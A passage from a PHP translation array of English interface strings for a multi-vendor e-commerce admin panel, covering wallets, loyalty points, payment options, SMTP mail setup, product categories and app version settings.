'admin_can_set_whether_customers_can_add_money_to_their_wallets_by_enabling_or_disabling_this_button' => 'Admin can set whether customers can add money to their wallets by enabling or disabling this button', 'want_to_Turn_ON_Add_Fund_to_Wallet_option' => 'Want to Turn ON Add Fund to Wallet option', 'want_to_Turn_OFF_Add_Fund_to_Wallet_option' => 'Want to Turn OFF Add Fund to Wallet option', 'if_enabled_customers_can_add_money_to_their_wallet' => 'If enabled customers can add money to their wallet', 'if_disabled_customers_would_not_be_able_to_add_money_to_their_wallet' => 'If disabled customers would not be able to add money to their wallet', 'minimum_Add_Fund_Amount' => 'Minimum Add Fund Amount', 'maximum_Add_Fund_Amount' => 'Maximum Add Fund Amount', 'customer_Loyalty_Point_Settings' => 'Customer Loyalty Point Settings', 'if_the_Customer_Loyalty_Point_option_is_disabled_above_all_settings_of_this_section_will_be_unavailable' => 'If the Customer Loyalty Point option is disabled above all settings of this section will be unavailable', 'equivalent_Point_to_1_Unit_Currency' => 'Equivalent Point to 1 Unit Currency', 'loyalty_Point_Earn_on_Each_Order' => 'Loyalty Point Earn on Each Order', '%' => '%', 'minimum_Point_Required_To_Convert' => 'Minimum Point Required To Convert', 'when_converting_loyalty_points_to_currency_customers_will_require_the_minimum_loyalty_point_set_by_the_admin' => 'When converting loyalty points to currency customers will require the minimum loyalty point set by the admin', 'customer_Referrer_Settings' => 'Customer Referrer Settings', 'earnings_to_Each_Referral' => 'Earnings to Each Referral', 'free_Delivery_Responsibility' => 'Free Delivery Responsibility', 'want_to_Turn_OFF_the_Temporary_Close_option' => 'Want to Turn OFF the Temporary Close option', 'want_to_Turn_ON_the_Temporary_Close_option' => 'Want to Turn ON the Temporary Close option', 'if_disabled_this_feature_will_be_hidden_from_the_system' => 'If disabled this feature will be hidden from the system', 'if_enabled_admin_can_temporarily_pause_his_shop_activities' => 'If enabled admin can temporarily pause his shop activities', 'by_turning_on_the' => 'By turning on the', 'temporary_Close' => 'Temporary Close', 'button_admin_can_pause_his_shop_activities_and_his_shop_will_be_shown_as' => 'Button admin can pause his shop activities and his shop will be shown as', 'in_the_system' => 'In the system', 'Customers_will_not_be_able_to_order_or_purchase_from_his_shop' => 'Customers will not be able to order or purchase from his shop', 'set_the_minimum_order_amount_a_customer_must_order_from_the_inhouse_shop' => 'Set the minimum order amount a customer must order from the inhouse shop', 'free_Delivery_Over_Amount' => 'Free Delivery Over Amount', 'set_the_default_commission_amount_that_will_be_received_from_sellers_on_each_order' => 'Set the default commission amount that will be received from sellers on each order', 'if_enabled_POS_will_be_available_on_the_Seller_Panel' => 'If enabled POS will be available on the Seller Panel', 'want_to_Turn_ON_POS_for_Seller' => 'Want to Turn ON POS for Seller', 'want_to_Turn_OFF_POS_for_Seller' => 'Want to Turn OFF POS for Seller', 'if_enabled_POS_option_will_be_available_in_the_Seller_Panel' => 'If enabled POS option will be available in the Seller Panel', 'if_disabled_POS_option_will_be_hidden_from_the_Seller_Panel' => 'If disabled POS option will be hidden from the Seller Panel', 'if_enabled_sellers_can_send_registration_requests_to_admin' => 'If enabled sellers can send registration requests to admin', 'want_to_Turn_ON_Self_Registration' => 'Want to Turn ON Self Registration', 'want_to_Turn_OFF_Self_Registration' => 'Want to Turn OFF Self Registration', 'if_enabled_sellers_can_register_by_themselves_from_website_or_app' => 'If enabled sellers can register by themselves from website or app', 'admin_can_review_the_registration_request_and_approve_or_deny_the_request' => 'Admin can review the registration request and approve or deny the request', 'if_disabled_Sellers_can_not_register_themselves_from_website_or_App' => 'If disabled Sellers can not register themselves from website or App', 'only_Admin_can_create_an_account_for_any_seller' => 'Only Admin can create an account for any seller', 'if_enabled_sellers_can_set_minimum_order_amount_for_their_stores_by_themselves' => 'If enabled sellers can set minimum order amount for their stores by themselves', 'want_to_Turn_ON_the_Set_Minimum_Order_Amount_option' => 'Want to Turn ON the Set Minimum Order Amount option', 'want_to_Turn_OFF_the_Set_Minimum_Order_Amount_option' => 'Want to Turn OFF the Set Minimum Order Amount option', 'if_disabled_sellers_cannot_set_the_minimum_order_amount_for_their_store_and_the_admin_will_set_it' => 'If disabled sellers cannot set the minimum order amount for their store and the admin will set it', 'set_whether_sellers_need_admin_approval_before_adding_new_products_to_their_shops' => 'Set whether sellers need admin approval before adding new products to their shops', 'successfully_uploaded' => 'Successfully uploaded', 'attribute_Setup' => 'Attribute Setup', 'add_new_attribute' => 'Add new attribute', 'attribute_Name' => 'Attribute Name', 'enter_Attribute_Name' => 'Enter Attribute Name', 'attribute_list' => 'Attribute list', 'search_by_Attribute_Name' => 'Search by Attribute Name', 'you_will not_be_able_to_revert_this' => 'You will not be able to revert this', 'attribute_deleted_successfully' => 'Attribute deleted successfully', 'all_shop' => 'All shop', 'Deluxe Online' => 'Deluxe Online', 'Mart Morning' => 'Mart Morning', 'Wellness Fair' => 'Wellness Fair', 'Bicycle Shop' => 'Bicycle Shop', 'KR Fashion' => 'KR Fashion', 'Country Fair' => 'Country Fair', 'Morning Mart' => 'Morning Mart', 'Royal Crown' => 'Royal Crown', 'Super Store Online' => 'Super Store Online', 'Digital Seller' => 'Digital Seller', 'Hello Store' => 'Hello Store', 'rating_High_to_Low' => 'Rating High to Low', 'rating_Low_to_High' => 'Rating Low to High', 'highest_Products' => 'Highest Products', 'lowest_Products' => 'Lowest Products', 'select_date_range' => 'Select date range', 'Great Hall' => 'Great Hall', 'Tell us' => 'Tell us', 'Arkohub' => 'Arkohub', 'Centre Point' => 'Centre Point', 'TrueMake' => 'TrueMake', 'The Wall' => 'The Wall', 'Dynamova' => 'Dynamova', 'Crave' => 'Crave', 'Framerce' => 'Framerce', 'Modentum' => 'Modentum', 'Axxelus' => 'Axxelus', 'Vivatiqo' => 'Vivatiqo', 'Digital Product House' => 'Digital Product House', 'Women s fashion' => 'Women s fashion', 'Men s fashion' => 'Men s fashion', 'Outdoor Fun & Sports' => 'Outdoor Fun & Sports', 'Toys Kids & Babies' => 'Toys Kids & Babies', 'Jewelry & Watches' => 'Jewelry & Watches', 'Beauty Health & Hair' => 'Beauty Health & Hair', 'Home Improvement & Tools' => 'Home Improvement & Tools', 'Computer Office & Security' => 'Computer Office & Security', 'Phones & Telecom' => 'Phones & Telecom', 'Bags & Shoes' => 'Bags & Shoes', 'Home Pet & Appliances' => 'Home Pet & Appliances', 'eBook' => 'EBook', 'Applications' => 'Applications', 'sub_categories' => 'Sub categories', 'all_sub_categories' => 'All sub categories', 'Shoes' => 'Shoes', 'Dress' => 'Dress', 'Jewelry' => 'Jewelry', 'Watches' => 'Watches', 'Story Book' => 'Story Book', 'Cooking Recipe' => 'Cooking Recipe', 'sub_sub_categories' => 'Sub sub categories', 'all_sub_sub_categories' => 'All sub sub categories', 'regular wear' => 'Regular wear', 'Comic Book' => 'Comic Book', 'Biography' => 'Biography', 'walking customer' => 'Walking customer', 'welcome_to_your_dashboard' => 'Welcome to your dashboard', 'welcome_to' => 'Welcome to', 'Easy Electronics' => 'Easy Electronics', 'Digital Spot' => 'Digital Spot', 'Electronic Agile' => 'Electronic Agile', 'Bazaar' => 'Bazaar', 'B. Store' => 'B. Store', 'Click & Collect' => 'Click & Collect', 'Online Shop' => 'Online Shop', 'Eratmart' => 'Eratmart', 'cgbfghnb' => 'Cgbfghnb', 'Order_is_already_delivered_and_transaction_amount_has_been_disbursed_changing_status_can_be_the_reason_of_miscalculation' => 'Order is already delivered and transaction amount has been disbursed changing status can be the reason of miscalculation', 'reorder' => 'Reorder', 'Reorder' => 'Reorder', 'my_Wallet' => 'My Wallet', 'if_you_want_to_add_fund_to_your_wallet_then_click_add_fund_button' => 'If you want to add fund to your wallet then click add fund button', 'add_fund_by_from_secured_digital_payment_gateways' => 'Add fund by from secured digital payment gateways', 'payment_Methods' => 'Payment Methods', 'faster_&_secure_way_to_pay_bill' => 'Faster & secure way to pay bill', 'all_Transaction' => 'All Transaction', 'converted_from_loyalty_point' => 'Converted from loyalty point', 'added_via_payment_method' => 'Added via payment method', 'earned_by_referral' => 'Earned by referral', 'leave_a_comment' => 'Leave a comment', 'file_type' => 'File type', 'maximum_size' => 'Maximum size', 'see_all_products' => 'See all products', 'total_balance' => 'Total balance', 'earn_money _o_your_wallet_by_completing_the_offer_&_challenged' => 'Earn money o your wallet by completing the offer & challenged', 'convert_your_loyalty_points_into_wallet_money' => 'Convert your loyalty points into wallet money', 'admin_also_rewards_their_top_customers_with_wallet_money' => 'Admin also rewards their top customers with wallet money', 'send_your_wallet_money_while_order' => 'Send your wallet money while order', 'the_amount_needs_to_be_between' => 'The amount needs to be between', 'add_fund_to_wallet_success' => 'Add fund to wallet success', 'old' => 'Old', 'check_all_order' => 'Check all order', 'add funds to wallet' => 'Add funds to wallet', 'order payment' => 'Order payment', 'fwrf' => 'Fwrf', 'order refund' => 'Order refund', 'point to wallet' => 'Point to wallet', 'from admin' => 'From admin', 'wallet_Bonus_Added_Successfully' => 'Wallet Bonus Added Successfully', 'status_Update_Successfully' => 'Status Update Successfully', 'customer_wallet_bonus_edit' => 'Customer wallet bonus edit', 'wallet_bonus_edit' => 'Wallet bonus edit', 'bonus_removed_Successfully' => 'Bonus removed Successfully', 'Infinity' => 'Infinity', 'Techno Lab' => 'Techno Lab', 'Electronics' => 'Electronics', 'E- tech' => 'E- tech', 'Digi Tech' => 'Digi Tech', 'Electron Pro' => 'Electron Pro', 'Digital Technology' => 'Digital Technology', 'Tech Light' => 'Tech Light', 'B. Technology' => 'B. Technology', 'Connection' => 'Connection', 'Camera Accessories' => 'Camera Accessories', 'Gadgets' => 'Gadgets', 'Laptop Tabs & Notebooks' => 'Laptop Tabs & Notebooks', 'Smartphone' => 'Smartphone', 'Network Components' => 'Network Components', 'Computer & Office' => 'Computer & Office', 'Mobile Accessories' => 'Mobile Accessories', 'TV & Home Appliance' => 'TV & Home Appliance', 'Audio' => 'Audio', 'Wearable' => 'Wearable', 'Consumer electronics' => 'Consumer electronics', 'Headphones' => 'Headphones', 'Charger' => 'Charger', 'Cable & Converters' => 'Cable & Converters', 'Bluetooth Speaker' => 'Bluetooth Speaker', 'Phone Case' => 'Phone Case', 'Wireless Earbuds' => 'Wireless Earbuds', 'Microphones' => 'Microphones', 'Television' => 'Television', 'Refrigerator' => 'Refrigerator', 'Microwaves' => 'Microwaves', 'Air Conditioner' => 'Air Conditioner', 'Router' => 'Router', 'Printer' => 'Printer', 'Keyboard & Mouse' => 'Keyboard & Mouse', 'Webcam' => 'Webcam', 'Man Watch' => 'Man Watch', 'Ladies Watch' => 'Ladies Watch', 'Smart Watch' => 'Smart Watch', 'Laptop cooler' => 'Laptop cooler', 'Hard disk' => 'Hard disk', 'Computer Ram' => 'Computer Ram', 'Power supply unit' => 'Power supply unit', 'SSD' => 'SSD', 'Digital Files' => 'Digital Files', 'Classic' => 'Classic', 'Internet Cable' => 'Internet Cable', 'Gamming Laptop' => 'Gamming Laptop', 'Central Air Conditioner.' => 'Central Air Conditioner.', 'Geothermal Air Conditioner' => 'Geothermal Air Conditioner', 'Portable Air Conditioner' => 'Portable Air Conditioner', 'Top Freezer Refrigerator' => 'Top Freezer Refrigerator', 'Digital Watches' => 'Digital Watches', 'Wireless' => 'Wireless', 'Mechanical' => 'Mechanical', 'Double Fan' => 'Double Fan', 'want_to_delete_this_item ' => 'Want to delete this item ', 'select_Sub_Category' => 'Select Sub Category', 'select_Sub_Sub_Category' => 'Select Sub Sub Category', 'select_Brand' => 'Select Brand', 'digital_file_ready' => 'Digital file ready', 'enter_tag' => 'Enter tag', 'image_format' => 'Image format', 'image_size' => 'Image size', 'must_upload_colour_wise_images_first._Colour_is_shown_in_the_image_section_top_right.' => 'Must upload colour wise images first. Colour is shown in the image section top right.', 'upload_additional_product_images' => 'Upload additional product images', 'total_point' => 'Total point', 'convert_your_loyalty_point_to_wallet_money.' => 'Convert your loyalty point to wallet money.', 'minimum_' => 'Minimum ', 'point_transaction_history' => 'Point transaction history', 'enters_point_amount' => 'Enters point amount', 'convert_point_to_wallet_money' => 'Convert point to wallet money', 'converted_amount' => 'Converted amount', 'only_earning_point_can_converted_to_wallet_money' => 'Only earning point can converted to wallet money', 'point_is_equal_to' => 'Point is equal to', 'Once_you_convert_the_point_into_money_then_it_won`t_back_to_point' => 'Once you convert the point into money then it won`t back to point', 'point_can_earn_by_placing_order_or_referral' => 'Point can earn by placing order or referral', 'delivery_Man_Settings' => 'Delivery Man Settings', 'upload_Picture_on_Delivery' => 'Upload Picture on Delivery', 'admin_can_set_whether_deliveryman_needs_to_upload_the_picture_of_delivery_by_enabling_or_disabling_this_button' => 'Admin can set whether deliveryman needs to upload the picture of delivery by enabling or disabling this button', 'by_Turning_ON_Picture_Upload_on_Delivery' => 'By Turning ON Picture Upload on Delivery', 'by_Turning_OFF_Picture_Upload_on_Delivery' => 'By Turning OFF Picture Upload on Delivery', 'if_enabled_deliverymen_can_upload_picture_at_the_order_deliveries_time' => 'If enabled deliverymen can upload picture at the order deliveries time', 'if_enabled_deliverymen_can_not_upload_picture_at_the_order_deliveries_time' => 'If enabled deliverymen can not upload picture at the order deliveries time', 'Updated_successfully' => 'Updated successfully', 'no_delivery_man_assigned' => 'No delivery man assigned', 884796 => '884796', 'Verification_Code' => 'Verification Code', 'payment_methods' => 'Payment methods', 'if_enabled _the_cash_on_delivery_option_will_be_available_on_the_system._Customers_can_use_COD_as_a_payment_option' => 'If enabled the cash on delivery option will be available on the system. Customers can use COD as a payment option', 'want_to_Turn_On_the_Cash_On_Delivery_option' => 'Want to Turn On the Cash On Delivery option', 'want_to_Turn_Off_the_Cash_On_Delivery_option' => 'Want to Turn Off the Cash On Delivery option', 'if_enabled_customers_can_select_Cash_on_Delivery_as_a_payment_method_during_checkout' => 'If enabled customers can select Cash on Delivery as a payment method during checkout', 'if_disabled_the Cash_on_Delivery_payment_method_will_be_hidden_from_the_checkout_page' => 'If disabled the Cash on Delivery payment method will be hidden from the checkout page', 'if_enabled _customers_can_choose_digital_payment_options_during_the_checkout_process' => 'If enabled customers can choose digital payment options during the checkout process', 'want_to_Turn_On_the_Digital_Payment_option' => 'Want to Turn On the Digital Payment option', 'want_to_Turn_Off_the_Digital_Payment_option' => 'Want to Turn Off the Digital Payment option', 'if_enabled_customers_can_select_Digital_Payment_during_checkout' => 'If enabled customers can select Digital Payment during checkout', 'if_disabled_Digital_Payment_options_will_be_hidden_from_the_checkout_page' => 'If disabled Digital Payment options will be hidden from the checkout page', 'offline_Payment_allows_customers_to_use_external_payment_methods._They_must_share_payment_details_with_the_seller_afterward._Admin_can_set_whether_customers_can_make_offline_payments_by_enabling/disabling_this_button. ' => 'Offline Payment allows customers to use external payment methods. They must share payment details with the seller afterward. Admin can set whether customers can make offline payments by enabling/disabling this button. ', 'want_to_Turn_On_the_Offline_Payment_option' => 'Want to Turn On the Offline Payment option', 'want_to_Turn_Off_the_Offline_Payment_option' => 'Want to Turn Off the Offline Payment option', 'if_enabled_customers_can_pay_through_external_payment_methods' => 'If enabled customers can pay through external payment methods', 'if_disabled_customers_have_to_use_the_system-added_payment_gateways' => 'If disabled customers have to use the system-added payment gateways', 'want_to_Turn_On_' => 'Want to Turn On ', '_as_the_Digital_Payment_method' => ' as the Digital Payment method', 'want_to_Turn_Off_' => 'Want to Turn Off ', 'if_enabled_customers_can_use_this_payment_method' => 'If enabled customers can use this payment method', 'if_disabled_this_payment_method_will_be_hidden_from_the_checkout_page' => 'If disabled this payment method will be hidden from the checkout page', 'mail_configuration' => 'Mail configuration', 'send_test_mail' => 'Send test mail', 'enter_mailer_name' => 'Enter mailer name', 'alex' => 'Alex', 'enter_the_name_of_the_host_of_your_mailing_service' => 'Enter the name of the host of your mailing service', 'smtp.mailtrap.io' => 'Smtp.mailtrap.io', 'enter_the_driver_for_your_mailing_service' => 'Enter the driver for your mailing service', 'smtp' => 'Smtp', 'enter_the_port_number_for_your_mailing_service' => 'Enter the port number for your mailing service', 'enter_the_username_of_your_account' => 'Enter the username of your account', 'ex : yahoo' => 'Ex : yahoo', 'email_ID' => 'Email ID', 'enter_your_email_ID' => 'Enter your email ID', 'example@example.com' => 'Example@example.com', 'enter_the_encryption_type' => 'Enter the encryption type', 'ex :' => 'Ex :', 'tls' => 'Tls', 'enter_your_password' => 'Enter your password', 'ex : Alex' => 'Ex : Alex', 'ex: mail.google.one' => 'Ex: mail.google.one', 'ex: salam' => 'Ex: salam', 'ex: 587' => 'Ex: 587', 'ex : ex@yahoo.com' => 'Ex : ex@yahoo.com', 'ex : tls' => 'Ex : tls', 'ex : 123456' => 'Ex : 123456', 'free_delivery_over_amount_for_every_seller_if_they_do_not_set_any_range_yet' => 'Free delivery over amount for every seller if they do not set any range yet', 'currently_you_are_managing_banners_for_' => 'Currently you are managing banners for ', 'these_saved_data_is_only_applicable_only_for_' => 'These saved data is only applicable only for ', 'if_you_change_theme_from_theme_setup_these_banners_will_not_be_shown_in_changed_theme._You_have_upload_all_the_banners_over_again _according_to_the_new_theme_ratio_and_sizes._If_you_switch_back_to_' => 'If you change theme from theme setup these banners will not be shown in changed theme. You have upload all the banners over again according to the new theme ratio and sizes. If you switch back to ', '_again_ _you_will_see_the_saved_data.' => ' again you will see the saved data.', 'banner_image_ratio_is_not_same_for_all_sections_in_website.Please_review_the_ratio_before_upload' => 'Banner image ratio is not same for all sections in website.Please review the ratio before upload', 'banner_image' => 'Banner image', 'banner_added_successfully' => 'Banner added successfully', 'now_you’ll_be_successfully_able_to_use_the_theme_for_your' => 'Now you’ll be successfully able to use the theme for your', 'N:B you_can_upload_only' => 'N:B you can upload only', 'theme_templates' => 'Theme templates', 'drag_&_drop_file_or_browse_file' => 'Drag & drop file or browse file', 'agent_number' => 'Agent number', 'paid_phone_number' => 'Paid phone number', 'Paid Phone Number' => 'Paid Phone Number', 'Transaction Id' => 'Transaction Id', '01-08-2023' => '01-08-2023', 'account_number' => 'Account number', 'Account Name' => 'Account Name', 'payer_name' => 'Payer name', 'Payer Name' => 'Payer Name', 'see_more' => 'See more', 'come_back_soon' => 'Come back soon', 'want_to_Turn_ON_the_Cash_On_Delivery_option' => 'Want to Turn ON the Cash On Delivery option', 'want_to_Turn_OFF_the_Cash_On_Delivery_option' => 'Want to Turn OFF the Cash On Delivery option', 'want_to_Turn_ON_the_Digital_Payment_option' => 'Want to Turn ON the Digital Payment option', 'want_to_Turn_OFF_the_Digital_Payment_option' => 'Want to Turn OFF the Digital Payment option', 'want_to_Turn_ON_the_Offline_Payment_option' => 'Want to Turn ON the Offline Payment option', 'want_to_Turn_OFF_the_Offline_Payment_option' => 'Want to Turn OFF the Offline Payment option', 'want_to_Turn_ON_' => 'Want to Turn ON ', 'want_to_Turn_OFF_' => 'Want to Turn OFF ', 'google_map_API_setup' => 'Google map API setup', 'credential_setup' => 'Credential setup', 'whatsapp_number' => 'Whatsapp number', 'find_SMTP_server_details' => 'Find SMTP server details', 'contact_your_email_service_provider_or_IT_administrator_to_obtain_the_SMTP_server_details _such_as_hostname _port _username _and_password' => 'Contact your email service provider or IT administrator to obtain the SMTP server details such as hostname port username and password', 'if_you`re_not_sure_where_to_find_these_details _check_the_email_provider`s_documentation_or_support_resources_for_guidance' => 'If you`re not sure where to find these details check the email provider`s documentation or support resources for guidance', 'configure_SMTP_settings' => 'Configure SMTP settings', 'go_to_the_SMTP_mail_setup_page_in_the_admin_panel' => 'Go to the SMTP mail setup page in the admin panel', 'enter_the_obtained_SMTP_server_details _including_the_hostname _port _username _and password' => 'Enter the obtained SMTP server details including the hostname port username and password', 'choose_the_appropriate_encryption_method' => 'Choose the appropriate encryption method', 'if_required' => 'If required', 'save_the_settings' => 'Save the settings', 'test_SMTP_connection' => 'Test SMTP connection', 'click_on_the' => 'Click on the', 'button_to_verify_the_SMTP_connection' => 'Button to verify the SMTP connection', 'if_successful _you_will_see_a_confirmation_message_indicating_that_the_connection_is_working_fine' => 'If successful you will see a confirmation message indicating that the connection is working fine', 'if_not _double-check_your_SMTP_settings_and_try_again' => 'If not double-check your SMTP settings and try again', 'if_you`re_unsure_about_the_SMTP_settings _contact_your_email_service_provider_or_IT_administrator_for_assistance' => 'If you`re unsure about the SMTP settings contact your email service provider or IT administrator for assistance', 'enable_mail_configuration' => 'Enable mail configuration', 'if_the_SMTP_connection_test_is_successful _you_can_now_enable_the_mail_configuration_services_by_toggling_the_switch_to_ ON ' => 'If the SMTP connection test is successful you can now enable the mail configuration services by toggling the switch to ON ', 'this_will_allow_the_system_to_send_emails_using_the_configured_SMTP_settings' => 'This will allow the system to send emails using the configured SMTP settings', 'send_a_test_mail_to_your_email' => 'Send a test mail to your email', 'a_test_mail_will_be_send_to_your_email_to' => 'A test mail will be send to your email to', 'confirm_it_works_perfectly' => 'Confirm it works perfectly', 'transaction id' => 'Transaction id', 'product_Setup' => 'Product Setup', 'Re-Order_Level' => 'Re-Order Level', 'set_the_stock_limit_for_the_Reorder_level' => 'Set the stock limit for the Reorder level', 'sellers_can_see_all_products_that_need_to_be_re_stocked_in_a_section_when_they_reach_this_ReOrder_Level' => 'Sellers can see all products that need to be re stocked in a section when they reach this ReOrder Level', 'sell_Digital_product' => 'Sell Digital product', 'if_enabled_sellers_can_sell_digital_products' => 'If enabled sellers can sell digital products', 'software' => 'Software', 'ebooks' => 'Ebooks', 'activation_keys' => 'Activation keys', 'in_their_shops' => 'In their shops', 'want_to_Turn_OFF_Digital_Product' => 'Want to Turn OFF Digital Product', 'want_to_Turn_ON_Digital_Product' => 'Want to Turn ON Digital Product', 'If_disabled_sellers_can_not_sell_digital_products_in_their_shops' => 'If disabled sellers can not sell digital products in their shops', 'If_enabled_sellers_can_sell_digital_products_in_their_shops' => 'If enabled sellers can sell digital products in their shops', 'show_brand' => 'Show brand', 'if_enabled_customers_can_see_brands_on_the_app_and_website' => 'If enabled customers can see brands on the app and website', 'they_can_browse_and_search_for_products_from_each_brand_inside_any_shop' => 'They can browse and search for products from each brand inside any shop', 'want_to_Turn_OFF_Product_Brand' => 'Want to Turn OFF Product Brand', 'want_to_Turn_ON_Product_Brand' => 'Want to Turn ON Product Brand', 'if_disabled_brand_section_will_be_hidden_from_the_customer_app_and_website' => 'If disabled brand section will be hidden from the customer app and website', 'promotional_Banners' => 'Promotional Banners', 'admin_Login_Page' => 'Admin Login Page', 'admin_login_url' => 'Admin login url', 'Add_dynamic_url_to_secure_admin_login_access.' => 'Add dynamic url to secure admin login access.', 'employee_Login_Page' => 'Employee Login Page', 'employee_login_url' => 'Employee login url', 'Add_dynamic_url_to_secure_employee_login_access.' => 'Add dynamic url to secure employee login access.', 'Updated_unsuccessful' => 'Updated unsuccessful', 'minimum_Order_Amount' => 'Minimum Order Amount', 'you_Get_Free_Delivery_Bonus' => 'You Get Free Delivery Bonus', 'check_Minimum_Order_Amount_Requirment' => 'Check Minimum Order Amount Requirment', 'email_not_found' => 'Email not found', 'roduct_list' => 'Roduct list', 'Product_List' => 'Product List', 'brand_Add' => 'Brand Add', 'brand_Setup' => 'Brand Setup', 'brand_Name' => 'Brand Name', 'product_Bulk_Import' => 'Product Bulk Import', 'download_the_format_file_and_fill_it_with_proper_data.' => 'Download the format file and fill it with proper data.', 'you_can_download_the_example_file_to_understand_how_the_data_must_be_filled.' => 'You can download the example file to understand how the data must be filled.', 'once_you_have_downloaded_and_filled_the_format_file' => 'Once you have downloaded and filled the format file', 'upload_it_in_the_form_below_and_submit.' => 'Upload it in the form below and submit.', 'after_uploading_products_you_need_to_edit_them_and_set_product_images_and_choices.' => 'After uploading products you need to edit them and set product images and choices.', 'you_can_get_brand_and_category_id_from_their_list_please_input_the_right_ids.' => 'You can get brand and category id from their list please input the right ids.', 'you_can_upload_your_product_images_in_product_folder_from_gallery_and_copy_image_path.' => 'You can upload your product images in product folder from gallery and copy image path.', 'do_not_have_the_template' => 'Do not have the template', 'new_Products_Requests' => 'New Products Requests', 'product_Updated_Requests' => 'Product Updated Requests', 'announcements' => 'Announcements', 'contact_List' => 'Contact List', 'customer_message_table' => 'Customer message table', 'search_by_Name_or_Mobile_No_or_Email' => 'Search by Name or Mobile No or Email', 'customer_Name' => 'Customer Name', 'contact_Info' => 'Contact Info', 'contact_deleted_successfully' => 'Contact deleted successfully', 'help_&_support' => 'Help & support', 'Withdraw_Request_Table' => 'Withdraw Request Table', 'mobile_number' => 'Mobile number', 'sales_Commission' => 'Sales Commission', 'if_sales_commission_is_disabled_here_the_system_default_commission_will_be_applied' => 'If sales commission is disabled here the system default commission will be applied', 'GST_Number' => 'GST Number', 'if_GST_number_is_disabled_here_it_will_not_show_in_invoice' => 'If GST number is disabled here it will not show in invoice', 'seller_POS' => 'Seller POS', 'Seller_POS_permission_on_or_off' => 'Seller POS permission on or off', 'turn_on' => 'Turn on', 'turn_off' => 'Turn off', 'review_list' => 'Review list', 'not_assign_yet' => 'Not assign yet', 'track_ID' => 'Track ID', 'want_to_delete_this_coupon ' => 'Want to delete this coupon ', 'coupon_applied_successfully' => 'Coupon applied successfully', 'offline_Payment' => 'Offline Payment', 'no_shipping_method_selected' => 'No shipping method selected', 'delivery_fee_discount' => 'Delivery fee discount', 'order_Placed_Successfully' => 'Order Placed Successfully', 'your_Order_ID' => 'Your Order ID', 'you_can_use_this_ID_to_track_your_order_later' => 'You can use this ID to track your order later', 'bearer' => 'Bearer', 'expense_Transaction_Statement' => 'Expense Transaction Statement', 'open_your_shop_and_start_selling.' => 'Open your shop and start selling.', 'password_does_not_match' => 'Password does not match', 'please_type_verify_code' => 'Please type verify code', 'brand' => 'Brand', 'total_Expense_Amount' => 'Total Expense Amount', 'free_Delivery_Amount' => 'Free Delivery Amount', 'coupon_Discount_Amount' => 'Coupon Discount Amount', 'free_Shipping_Over_Order_Amount_Discount' => 'Free Shipping Over Order Amount Discount', 'search_by_orders_id_or_refund_id' => 'Search by orders id or refund id', 'stores_one' => 'Stores one', 'stores_two' => 'Stores two', 'all_customers' => 'All customers', 'customer_one' => 'Customer one', 'customer_two' => 'Customer two', 'total_transactions' => 'Total transactions', 'search_product_name' => 'Search product name', 'fixed' => 'Fixed', 'recurring' => 'Recurring', 'all_Products' => 'All Products', 'product_Stock' => 'Product Stock', 'wish_Listed_Products' => 'Wish Listed Products', 'total_Product_Sale' => 'Total Product Sale', 'total_Discount_Given' => 'Total Discount Given', 'product_Statistics' => 'Product Statistics', 'the_product_report_will_show_based_on_the_product_added_date' => 'The product report will show based on the product added date', 'product_Unit_Price' => 'Product Unit Price', 'total_Amount_Sold' => 'Total Amount Sold', 'total_Quantity_Sold' => 'Total Quantity Sold', 'average_Product_Value' => 'Average Product Value', 'current_Stock_Amount' => 'Current Stock Amount', 'average_Ratings' => 'Average Ratings', 'last_Updated_Stock' => 'Last Updated Stock', 'current_Stock' => 'Current Stock', 'out_of_Stock' => 'Out of Stock', 'soon_Stock_Out' => 'Soon Stock Out', 'in-Stock' => 'In-Stock', 'total_in_Wishlist' => 'Total in Wishlist', 'no_data_to_found' => 'No data to found', 'Settings_updated' => 'Settings updated', 'Message_updated' => 'Message updated', 'in_House_Order' => 'In House Order', 'seller_Order' => 'Seller Order', 'total_In-House_Products' => 'Total In-House Products', 'admin_Net_Income' => 'Admin Net Income', '32 inches Android Smart TV (4GB RAM and 8GB ROM)' => '32 inches Android Smart TV (4GB RAM and 8GB ROM)', 'maximum_file_size' => 'Maximum file size', 'have_to_upload_zip_file' => 'Have to upload zip file', 'please_be_reminded_that_you_have_to_setup_data_for_these_section_for' => 'Please be reminded that you have to setup data for these section for', 'Banners' => 'Banners', 'user_app_version_control' => 'User app version control', 'for_android' => 'For android', 'minimum_Customer_App_Version' => 'Minimum Customer App Version', 'the_minimum_customer_app_version_required_for_the_app_functionality' => 'The minimum customer app version required for the app functionality', 'ex: 2.1' => 'Ex: 2.1', 'download_URL_For_Customer_App' => 'Download URL For Customer App', 'customers_will_download_the_latest_customer_app_version_using_this_URL' => 'Customers will download the latest customer app version using this URL', 'for_ios' => 'For ios', 'seller_app_version_control' => 'Seller app version control', 'minimum_Seller_app_version' => 'Minimum Seller app version', 'the_minimum_seller_app_version_required_for_the_app_functionality' => 'The minimum seller app version required for the app functionality', 'download_URL_For_Seller_App' => 'Download URL For Seller App', 'sellers_will_download_the_latest_seller_app_version_using_this_URL' => 'Sellers will download the latest seller app version using this URL', 'delivery_man_app_version_control' => 'Delivery man app version control', 'minimum_Deliveryman_App_Version' => 'Minimum Deliveryman App Version', 'the_minimum_deliveryman_app_version_required_for_the_app_functionality' => 'The minimum deliveryman app version required for the app functionality', 'download_URL_For_Deliveryman_App' => 'Download URL For Deliveryman App', 'deliverymen_will_download_the_latest_deliveryman_app_version_using_this_URL' => 'Deliverymen will download the latest deliveryman app version using this URL', 'what_is_App_Version' => 'What is App Version', 'this_app_version_means_the_minimum_version_of_Seller_Deliveryman_and_Customer_apps_that_are_required_for_the_update' => 'This app version means the minimum version of Seller Deliveryman and Customer apps that are required for the update', 'it_does_not_represent_the_Play_Store_or_App_Store_version' => 'It does not represent the Play Store or App Store version', 'app_Download_Link' => 'App Download Link', 'the_app_download_link_is_the_URL_that_allows_users_to_update_the_app_by_clicking_the_Update_App_button_within_the_app_itself' => 'The app download link is the URL that allows users to update the app by clicking the Update App button within the app itself', 'your_current_sms_settings_are_disabled _because_you_have_enabled_sms_gateway_addon' => 'Your current sms settings are disabled because you have enabled sms gateway addon', 'To_visit_your_currently_active_sms_gateway_settings_please_follow_the_link.' => 'To visit your currently active sms gateway settings please follow the link.', 'want_to_turn_ON_releans' => 'Want to turn ON releans', 'want_to_turn_OFF_releans' => 'Want to turn OFF releans', 'if_enabled _this_SMS_service_will_be_available_in_the_system' => 'If enabled this SMS service will be available in the system', 'if_disabled _this_SMS_service_will_be_hidden_from_the_system ' => 'If disabled this SMS service will be hidden from the system ', 'want_to_turn_ON_twilio_sms' 